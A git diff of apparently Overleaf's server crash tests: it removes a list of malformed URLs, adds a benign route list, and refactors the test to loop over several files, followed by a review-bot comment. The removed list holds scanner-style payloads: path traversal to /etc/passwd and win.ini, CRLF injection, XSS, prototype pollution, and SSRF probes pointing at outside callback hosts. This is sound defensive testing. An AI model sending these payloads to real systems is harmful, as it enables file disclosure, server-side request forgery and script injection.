diff --git a/services/web/test/acceptance/files/crash_test_urls.txt b/services/web/test/acceptance/files/crash_test_urls.txt
deleted file mode 100644
index 39e066d92c..0000000000
--- a/services/web/test/acceptance/files/crash_test_urls.txt
+++ /dev/null
@@ -1,192 +0,0 @@ -// -///%09/example.com -//%0D%0ASet-Cookie:crlfinjection=crlfinjection -///////%20.../%20.../%20.../%20.../%20.../%20.../etc%2fpasswd -///////%20.../%20.../%20.../%20.../%20.../%20.../etc%2fpasswd/ -///////%20../%20../%20../%20../%20../%20../etc%2fpasswd -///////%20../%20../%20../%20../%20../%20../etc%2fpasswd/ -///////%20.../%20.../%20.../%20.../%20.../%20.../etc%2fpasswd%23vt/test -///////%20../%20../%20../%20../%20../%20../etc%2fpasswd%23vt/test -///////%20.../%20.../%20.../%20.../%20.../%20.../etc%5cpasswd -///////%20.../%20.../%20.../%20.../%20.../%20.../etc%5cpasswd/ -///////%20../%20../%20../%20../%20../%20../etc%5cpasswd -///////%20../%20../%20../%20../%20../%20../etc%5cpasswd/ -///////%20.../%20.../%20.../%20.../%20.../%20.../etc%5cpasswd%23vt/test -///////%20../%20../%20../%20../%20../%20../etc%5cpasswd%23vt/test -///////%20.../%20.../%20.../%20.../%20.../%20.../etc/passwd -///////%20.../%20.../%20.../%20.../%20.../%20.../etc/passwd/ -///////%20../%20../%20../%20../%20../%20../etc/passwd -///////%20../%20../%20../%20../%20../%20../etc/passwd/ -///////%20.../%20.../%20.../%20.../%20.../%20.../etc/passwd%23vt/test -///////%20../%20../%20../%20../%20../%20../etc/passwd%23vt/test -///////%20.../%20.../%20.../%20.../%20.../%20.../etc\x5Cpasswd -///////%20.../%20.../%20.../%20.../%20.../%20.../etc\x5Cpasswd/ -///////%20../%20../%20../%20../%20../%20../etc\x5Cpasswd -///////%20../%20../%20../%20../%20../%20../etc\x5Cpasswd/ -///////%20.../%20.../%20.../%20.../%20.../%20.../etc\x5Cpasswd%23vt/test -///////%20../%20../%20../%20../%20../%20../etc\x5Cpasswd%23vt/test -//%2509/example.com -///%2509/example.com -////%2509/example.com -//%250d%250ahttp://example.com/ -//.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/windows/win.ini -//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd -//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini 
-//%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini -//..%255C../..%255C../..%255C../..%255C../..%255C../..%255C../etc/profile -//%255cexample.com -///%255cexample.com -////%255cexample.com -//%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/etc/profile -//..%25c0%25af../..%25c0%25af../..%25c0%25af../..%25c0%25af../..%25c0%25af../..%25c0%25af../etc/profile -//%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd -//%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini -//.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd -//.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini -//%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd -//%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini -//%5c../%5c../%5c../%5c../%5c../%5c../%5c../etc/passwd -//..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd -//..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd -//..%5c..%5c..%5c..%5c..%5cetc/passwd -//..%5c..%5c..%5c..%5cetc/passwd -//..%5c..%5c..%5cetc/passwd -//..%5c..%5cetc/passwd -//..%5cetc/passwd -//%5cexample.com -////%5cexample.com -//?AaauA=olihQ -//%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd -//%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini -//%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd -//%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini -//%c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml -//%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml -//%c0%ae/%c0%ae/WEB-INF/web.xml -//%c0%ae/WEB-INF/web.xml -//.env.150 -//.env.34.213 -//////////etc%2fpasswd -//////////etc%2fpasswd/ -/////////etc%2fpasswd 
-/////////etc%2fpasswd/ -////////etc%2fpasswd -////////etc%2fpasswd/ -////etc%2fpasswd -////etc%2fpasswd/ -///etc%2fpasswd -///etc%2fpasswd/ -//etc%2fpasswd -//etc%2fpasswd/ -//////////etc%2fpasswd%23vt/test -/////////etc%2fpasswd%23vt/test -////////etc%2fpasswd%23vt/test -////etc%2fpasswd%23vt/test -///etc%2fpasswd%23vt/test -//etc%2fpasswd%23vt/test -//////////etc%5cpasswd -//////////etc%5cpasswd/ -/////////etc%5cpasswd -/////////etc%5cpasswd/ -////////etc%5cpasswd -////////etc%5cpasswd/ -////etc%5cpasswd -////etc%5cpasswd/ -///etc%5cpasswd -///etc%5cpasswd/ -//etc%5cpasswd -//etc%5cpasswd/ -//////////etc%5cpasswd%23vt/test -/////////etc%5cpasswd%23vt/test -////////etc%5cpasswd%23vt/test -////etc%5cpasswd%23vt/test -///etc%5cpasswd%23vt/test -//etc%5cpasswd%23vt/test -//example%2500.com -//example%25E3%2580%2582com -//https%253a//example.com// -//https%253a///example.com/%252e%252e -//https%253a//example.com/%252e%252e%252f -//https%3a//example.com/%2e%2e%2f -//https%3a//example.com/..%2f -//overleaf.example.com.443/libs/cq/contentinsight/content/proxy.reportingservices.json;%0a.html?url=http://overleaf.example.com.443.lcccprjn.mk7.xyz%23/api1.omniture.com/a&q=a -//overleaf.example.com.443/libs/cq/contentinsight/content/proxy.reportingservices.json/a.ico?url=http://overleaf.example.com.443.lcccpru.mk7.xyz%23/api1.omniture.com/a&q=a -//overleaf.example.com.443/libs///cq///contentinsight///content///proxy.reportingservices.json?url=http://overleaf.example.com.443.lcccccc.mk7.xyz%23/api1.omniture.com/a&q=a&.css -//overleaf.example.com.443/libs/cq/contentinsight/content/proxy.reportingservices.json?url=http://overleaf.example.com.443.lcccpr.mk7.xyz%23/api1.omniture.com/a&q=a&.css -//overleaf.example.com.443/libs/cq/contentinsight/proxy/reportingservices.json.get.servlet;%0a.html?url=http://overleaf.example.com.443.lccprjnu.mk7.xyz%23/api1.omniture.com/a&q=a 
-//overleaf.example.com.443/libs/cq/contentinsight/proxy/reportingservices.json.get.servlet.a.21.css?url=http://overleaf.example.com.443.lccprcu.mk7.xyz%23/api1.omniture.com/a&q=a -//overleaf.example.com.443//libs/cq/contentinsight/proxy/reportingservices.json.get.servlet.a.21.css?url=http://overleaf.example.com.443.llccprj.mk7.xyz%23/api1.omniture.com/a&q=a -//overleaf.example.com.443/libs/cq/contentinsight/proxy/reportingservices.json.get.servlet/a.ico?url=http://overleaf.example.com.443.lccpr.mk7.xyz%23/api1.omniture.com/a&q=a -//overleaf.example.com.443/libs/cq/contentinsight/proxy/reportingservices.json.get.servlet.css?url=http://overleaf.example.com.443.lccpruc.mk7.xyz%23/api1.omniture.com/a&q=a -//overleaf.example.com.443/libs/cq/contentinsight/proxy/reportingservices.json.get.servlet.html?url=http://overleaf.example.com.443.lccpruh.mk7.xyz%23/api1.omniture.com/a&q=a -//overleaf.example.com.443/libs/cq/contentinsight/proxy/reportingservices.json.get.servlet.ico?url=http://overleaf.example.com.443.lccpri.mk7.xyz%23/api1.omniture.com/a&q=a -//overleaf.example.com.443/libs///cq///contentinsight///proxy///reportingservices.json.get.servlet?url=http://overleaf.example.com.443.lccprjg.mk7.xyz%23/api1.omniture.com/a&q=a&.css -//overleaf.example.com.443/libs/cq/contentinsight/proxy/reportingservices.json.get.servlet?url=http://overleaf.example.com.443.lccpr.mk7.xyz%23/api1.omniture.com/a&q=a&.css -//overleaf.example.com.443/libs/mcm/salesforce/customer/a.ico?checktype=authorize&authorization_url=http://overleaf.example.com.443.lmscaic.mk7.xyz&customer_key=zzzz&customer_secret=zzzz&redirect_uri=xxxx&code=e -//overleaf.example.com.443/libs/mcm/salesforce/customer?checktype=authorize&authorization_url=http://overleaf.example.com.443.lmscc.mk7.xyz&customer_key=zzzz&customer_secret=zzzz&redirect_uri=xxxx&code=e&.css 
-//overleaf.example.com.443/libs/mcm/salesforce/customer.html;%0aa.css?checktype=authorize&authorization_url=http://overleaf.example.com.443.lmsmn.mk7.xyz&customer_key=zzzz&customer_secret=zzzz&redirect_uri=xxxx&code=e -//overleaf.example.com.443/libs/opensocial/makerequest;%0a.html?container=default&url=http://overleaf.example.com.443.lomnh.mk7.xyz/os/omn -//overleaf.example.com.443/libs/opensocial/makerequest/a.ico?container=default&url=http://overleaf.example.com.443.lomai.mk7.xyz/os/aim -//overleaf.example.com.443/libs///opensocial///makerequest?container=default&url=http://overleaf.example.com.443.lomcd.mk7.xyz/&.css -//overleaf.example.com.443/libs/opensocial/makerequest?container=default&url=http://overleaf.example.com.443.lomc.mk7.xyz/&.css -//overleaf.example.com.443/plugins/servlet/issue-retriever?columns=summary&url=http://overleaf.example.com.443.psic.mk7.xyz/os/aba -//overleaf.example.com.443/rest/sharelinks/1.0/link?url=http://overleaf.example.com.443.rsol.mk7.xyz/os/ros -//ozTaSrMQ%22%3E%3Cimg%20src=a%20onerror=alert%28document.domain%29%3E/..CFIDE/administrator/index.cfm -//ozTaSrMQ%22%3E%3Cimg%20src=a%20onerror=alert%28document.domain%29%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm -//ozTaSrMQ%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/..CFIDE/administrator/index.cfm -//ozTaSrMQ%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm -//?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini -//?__proto__%5Bsssied%5D=sssieda&__proto__.sssied=sssiedb&constructor.prototype.sssied=sssiedc&constructor%5Bprototype%5D%5Bsssied%5D=sssiedd&x.__proto__.sssied=sssiede&x%5B__proto__%5D%5Bsssied%5D=sssiedf&x.constructor.prototype.sssied=sssiedg&x%5Bconstructor%5D%5Bprototype%5D%5Bsssied%5D=sssiedh -//proxy.stream%3Forigin=http://overleaf.example.com.443.ppsto.mk7.xyz -//qNAViNxG%22%3E%3Cimg%20src=a%20onerror=alert%28document.domain%29%3E/..CFIDE/administrator/index.cfm 
-//qNAViNxG%22%3E%3Cimg%20src=a%20onerror=alert%28document.domain%29%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm -//qNAViNxG%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/..CFIDE/administrator/index.cfm -//qNAViNxG%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm -//?redirect=..%2f..%2f..%2f..%2fwindows/win.ini -//?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini -/\x5Cu001B]8;;https://interact.sh\x22/onmouseover=\x22alert(1)\x5Cu0007example\x5Cu001B]8;;\x5Cu0007 -/\x5C\x5C\x5C\x5C\x5C\x5C%20.../%20.../%20.../%20.../%20.../%20.../etc%2fpasswd -/\x5C\x5C\x5C\x5C\x5C\x5C%20.../%20.../%20.../%20.../%20.../%20.../etc%2fpasswd/ -/\x5C\x5C\x5C\x5C\x5C\x5C%20../%20../%20../%20../%20../%20../etc%2fpasswd -/\x5C\x5C\x5C\x5C\x5C\x5C%20../%20../%20../%20../%20../%20../etc%2fpasswd/ -/\x5C\x5C\x5C\x5C\x5C\x5C%20.../%20.../%20.../%20.../%20.../%20.../etc%2fpasswd%23vt/test -/\x5C\x5C\x5C\x5C\x5C\x5C%20../%20../%20../%20../%20../%20../etc%2fpasswd%23vt/test -/\x5C\x5C\x5C\x5C\x5C\x5C%20.../%20.../%20.../%20.../%20.../%20.../etc%5cpasswd -/\x5C\x5C\x5C\x5C\x5C\x5C%20.../%20.../%20.../%20.../%20.../%20.../etc%5cpasswd/ -/\x5C\x5C\x5C\x5C\x5C\x5C%20../%20../%20../%20../%20../%20../etc%5cpasswd -/\x5C\x5C\x5C\x5C\x5C\x5C%20../%20../%20../%20../%20../%20../etc%5cpasswd/ -/\x5C\x5C\x5C\x5C\x5C\x5C%20.../%20.../%20.../%20.../%20.../%20.../etc%5cpasswd%23vt/test -/\x5C\x5C\x5C\x5C\x5C\x5C%20../%20../%20../%20../%20../%20../etc%5cpasswd%23vt/test -/\x5C\x5C\x5C\x5C\x5C\x5C%20.../%20.../%20.../%20.../%20.../%20.../etc/passwd -/\x5C\x5C\x5C\x5C\x5C\x5C%20.../%20.../%20.../%20.../%20.../%20.../etc/passwd/ -/\x5C\x5C\x5C\x5C\x5C\x5C%20../%20../%20../%20../%20../%20../etc/passwd -/\x5C\x5C\x5C\x5C\x5C\x5C%20../%20../%20../%20../%20../%20../etc/passwd/ -/\x5C\x5C\x5C\x5C\x5C\x5C%20.../%20.../%20.../%20.../%20.../%20.../etc/passwd%23vt/test 
-/\x5C\x5C\x5C\x5C\x5C\x5C%20../%20../%20../%20../%20../%20../etc/passwd%23vt/test -/\x5C\x5C\x5C\x5C\x5C\x5C%20.../%20.../%20.../%20.../%20.../%20.../etc\x5Cpasswd -/\x5C\x5C\x5C\x5C\x5C\x5C%20.../%20.../%20.../%20.../%20.../%20.../etc\x5Cpasswd/ -/\x5C\x5C\x5C\x5C\x5C\x5C%20../%20../%20../%20../%20../%20../etc\x5Cpasswd -/\x5C\x5C\x5C\x5C\x5C\x5C%20../%20../%20../%20../%20../%20../etc\x5Cpasswd/ -/\x5C\x5C\x5C\x5C\x5C\x5C%20.../%20.../%20.../%20.../%20.../%20.../etc\x5Cpasswd%23vt/test -/\x5C\x5C\x5C\x5C\x5C\x5C%20../%20../%20../%20../%20../%20../etc\x5Cpasswd%23vt/test -/\x5C\x5C\x5C\x5C\x5C\x5C///etc%2fpasswd -/\x5C\x5C\x5C\x5C\x5C\x5C///etc%2fpasswd/ -/\x5C\x5C\x5C\x5C\x5C\x5C//etc%2fpasswd -/\x5C\x5C\x5C\x5C\x5C\x5C//etc%2fpasswd/ -/\x5C\x5C\x5C\x5C\x5C\x5C/etc%2fpasswd -/\x5C\x5C\x5C\x5C\x5C\x5C/etc%2fpasswd/ -/\x5C\x5C\x5C\x5C\x5C\x5C///etc%2fpasswd%23vt/test -/\x5C\x5C\x5C\x5C\x5C\x5C//etc%2fpasswd%23vt/test -/\x5C\x5C\x5C\x5C\x5C\x5C/etc%2fpasswd%23vt/test -/\x5C\x5C\x5C\x5C\x5C\x5C///etc%5cpasswd -/\x5C\x5C\x5C\x5C\x5C\x5C///etc%5cpasswd/ -/\x5C\x5C\x5C\x5C\x5C\x5C//etc%5cpasswd -/\x5C\x5C\x5C\x5C\x5C\x5C//etc%5cpasswd/ -/\x5C\x5C\x5C\x5C\x5C\x5C/etc%5cpasswd -/\x5C\x5C\x5C\x5C\x5C\x5C/etc%5cpasswd/ -/\x5C\x5C\x5C\x5C\x5C\x5C///etc%5cpasswd%23vt/test -/\x5C\x5C\x5C\x5C\x5C\x5C//etc%5cpasswd%23vt/test -/\x5C\x5C\x5C\x5C\x5C\x5C/etc%5cpasswd%23vt/test -//?sssieddparamNamexsx=dummy&address=sssieddaddressxsx&redirect=sssieddredirectxsx&userid=sssiedduseridxsx 
-//?sssieddparamNamexsx=dummy&address=sssieddaddressxsx&tags=sssieddtagsxsx&feed=sssieddfeedxsx&stage=sssieddstagexsx&level=sssieddlevelxsx&activate=sssieddactivatexsx&state=sssieddstatexsx&confirm=sssieddconfirmxsx&utm_campaign=sssieddutm_campaignxsx&visible=sssieddvisiblexsx&linkurl=sssieddlinkurlxsx&request=sssieddrequestxsx&all=sssieddallxsx&return_url=sssieddreturn_urlxsx&SAMLRequest=sssieddSAMLRequestxsx&src=sssieddsrcxsx&cmd=sssieddcmdxsx&Referer=sssieddRefererxsx&image_host=sssieddimage_hostxsx&cancel=sssieddcancelxsx&end=sssieddendxsx&group=sssieddgroupxsx&uuid=sssiedduuidxsx&short=sssieddshortxsx&version=sssieddversionxsx
-//?sssieddparamNamexsx=dummy&add=sssieddaddxsx&address=sssieddaddressxsx&log=sssieddlogxsx&step=sssieddstepxsx&reset=sssieddresetxsx&checked=sssieddcheckedxsx&other=sssieddotherxsx&settings=sssieddsettingsxsx&meta=sssieddmetaxsx&message=sssieddmessagexsx&dir=sssiedddirxsx&pass=sssieddpassxsx&issues=sssieddissuesxsx&from=sssieddfromxsx&parent=sssieddparentxsx&f=sssieddfxsx&ref=sssieddrefxsx&color=sssieddcolorxsx&fetch=sssieddfetchxsx&users=sssieddusersxsx&content=sssieddcontentxsx&generate=sssieddgeneratexsx&admin=sssieddadminxsx&msg=sssieddmsgxsx&URL=sssieddURLxsx
diff --git a/services/web/test/acceptance/files/crash_test_urls/basic.txt b/services/web/test/acceptance/files/crash_test_urls/basic.txt
new file mode 100644
index 0000000000..556474cf89
--- /dev/null
+++ b/services/web/test/acceptance/files/crash_test_urls/basic.txt
@@ -0,0 +1,22 @@
+/
+//
+/user/contacts
+/user/password/reset
+/user/password/set
+/home
+/user/subscription
+/subscription/invites/
+/login
+/restricted
+/register
+/user/bonus
+/system/messages
+/user/settings
+/user/projects
+/project
+/api/project
+/project/download/zip
+/tag
+/notifications
+/beta/participate
+/unsupported-browser
diff --git a/services/web/test/acceptance/src/ServerCrashTests.js b/services/web/test/acceptance/src/ServerCrashTests.js
index 7185e1a803..1587e2d8aa 100644
--- a/services/web/test/acceptance/src/ServerCrashTests.js
+++ b/services/web/test/acceptance/src/ServerCrashTests.js
@@ -4,24 +4,28 @@ const Path = require('path')
 const fetch = require('node-fetch')
 const UserHelper = require('./helpers/UserHelper')
 const BASE_URL = UserHelper.baseUrl()
+const glob = require('glob')
 
-const CRASH_TEST_URLS = fs
-  .readFileSync(Path.join(__dirname, '../files/crash_test_urls.txt'))
-  .toString()
-  .split('\n')
+// Test all files in the crash_test_urls directory
+const CRASH_TEST_FILES = glob.sync(
+  Path.join(__dirname, '../files/crash_test_urls/*.txt')
+)
 
 describe('Server Crash Tests', function () {
-  it(`should not crash on bad urls`, async function () {
-    // increase the timeout for this test due to the number of urls
-    this.timeout(60 * 1000)
-    // test each url in the list
-    for (let i = 0; i < CRASH_TEST_URLS.length; i++) {
-      const url = BASE_URL + CRASH_TEST_URLS[i]
-      const response = await fetch(url)
-      expect(response.status).to.not.match(
-        /5\d\d/,
-        `Request to ${url} failed with status ${response.status}`
-      )
-    }
-  })
+  for (const file of CRASH_TEST_FILES) {
+    const crashTestUrls = fs.readFileSync(file).toString().split('\n')
+    it(`should not crash on bad urls in ${file}`, async function () {
+      // increase the timeout for these tests due to the number of urls
+      this.timeout(60 * 1000)
+      // test each url in the list
+      for (let i = 0; i < crashTestUrls.length; i++) {
+        const url = BASE_URL + crashTestUrls[i]
+        const response = await fetch(url)
+        expect(response.status).to.not.match(
+          /5\d\d/,
+          `Request to ${url} failed with status ${response.status}`
+        )
+      }
+    })
+  }
 })
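Review bot: If the pattern passed to `glob.sync` on the new `CRASH_TEST_FILES` line matches nothing (a typo in the path, or the directory being moved again), the `for (const file of CRASH_TEST_FILES)` loop registers zero `it` cases and the suite passes green with no crash coverage at all, which is the silent failure this test exists to prevent; guard it immediately after the `glob.sync` call with `if (CRASH_TEST_FILES.length === 0) throw new Error('no crash_test_urls/*.txt files found')`. `split('\n')` on a newline-terminated file leaves a trailing empty string, so every file also fires one extra request to `BASE_URL` itself and any blank line in a future payload file does the same; `const crashTestUrls = fs.readFileSync(file).toString().split('\n').filter(line => line.length > 0)` drops those while deliberately not trimming, since leading or trailing whitespace in an encoded payload may be intentional. node-fetch applies no timeout by default, so a route that hangs rather than 5xx-ing only surfaces as the generic 60 s mocha timeout without naming the offending URL; if the installed node-fetch is v2, `const response = await fetch(url, { timeout: 10000 })` keeps the per-URL assertion message meaningful. `require('glob')` is a new dependency for this file; if `glob` is only present transitively (for example via mocha) it should be declared explicitly in devDependencies so a transitive upgrade cannot break the suite.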